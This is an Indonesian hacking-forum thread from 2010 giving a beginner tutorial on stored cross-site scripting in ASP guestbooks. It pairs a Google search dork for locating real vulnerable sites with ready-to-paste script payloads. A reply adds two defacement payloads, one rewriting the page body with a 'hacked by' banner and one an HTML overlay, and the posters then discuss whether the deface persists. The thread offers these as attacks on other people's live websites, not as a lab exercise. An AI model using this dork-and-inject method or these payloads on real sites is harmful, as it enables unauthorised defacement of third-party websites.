Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Newbie only] XSS for hajar guestbook

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[Newbie only] XSS for hajar guestbook

Postby demonbrando » Sun Aug 22, 2010 1:12 am

maaf klo tutor ini repost,klo repost or salah tempat apus or pindahin aja om poni :maaf: :maaf:

tutor ini sama dengan tutor om darkzzz yg tentang deface guestbook tapi ini lebih cupu dari tutor om darkzzz maklum masih newbie... :circle: :circle:

oke langsung ajah mulae,pertama kita cari website yg ada guestbooknya
contoh : buka google terus ketik : allinurl:/guestbook.asp

klo sudah cari web yg kamu mau...
contoh sperti ini : Image

kalo sudah copas script berikut ini :

Code: Select all
<script type="text/javascript">alert('hacked by : DemonBrando a.k.a D.13..')</script>


scriptnya bisa kamu ubah sesuka kamu...

dan hasilnya akan jadi seperti gambar di bawah ini :
Image

selamat mencoba... :rokok:

maklum tutornya masih cupu apabila ada kesalahan mohon pencerahanya yah kk... :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Newbie only] XSS for hajar guestbook

Postby Darkzzzz » Sun Aug 22, 2010 1:29 am

verify.asp?
Ane gak ngerti gan, mentok cuma sampe verify.asp nya doank yang ke deface :circle:
Pas di refresh, ya normal lagi :mati:
Harusnya yang ke deface itu halaman untuk membaca buku tamu yang orang-orang submit :putusasa: Betul kagak gan? :cry:

Code: Select all
<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : Darkzzzz<br/>Greetz To : Poni, Wilmar Kidz, Phychole, Paman, XShadow, Abah, Bi4kKob4r, Peniru, Hanjian Family, 3tr3m3b0y, etc<br/>Visit http://xcode.or.id";</script>


atau

Code: Select all
<DIV align=center>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px;  1; LEFT: 1px; BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
<br /><br />
<br>
<center>
<font face="Arial" color="red" size="4"><strong><br><br><br>XSS Defacing
<br>
</center>
<font face="Courier New" color="#FF0000" size="3"><center>Greetz To : 2KA01,XCode,Adelia,Si S (2KA01)</left></font>

<left><font face="arial" size="3" color="#FF0000">
<marquee behavior="alternate" scrolldelay="100" style="width: 90%">Sez L3ve B4 U'r XPunged.!!!!!
</li>
</ul>
</td>
</tr>
</table>
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: [Newbie only] XSS for hajar guestbook

Postby demonbrando » Sun Aug 22, 2010 10:24 pm

hehehe ini cuma hajar bagian dari sisi client aja om darkzzz ga di deface om cuma nampilin message box kyk di gambar di atas om darkzzz klo udah di refresh yah toh balik lagi ke awal.... maklum om saya bukan defacer and bikin tutorial masih cupu.... :circle: :circle: :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Newbie only] XSS for hajar guestbook

Postby inyo^ » Thu Oct 28, 2010 5:59 pm

wah wah.. heheh
inyo^
 
Posts: 19
Joined: Fri Feb 19, 2010 9:31 pm

leave a comment


Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 15 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id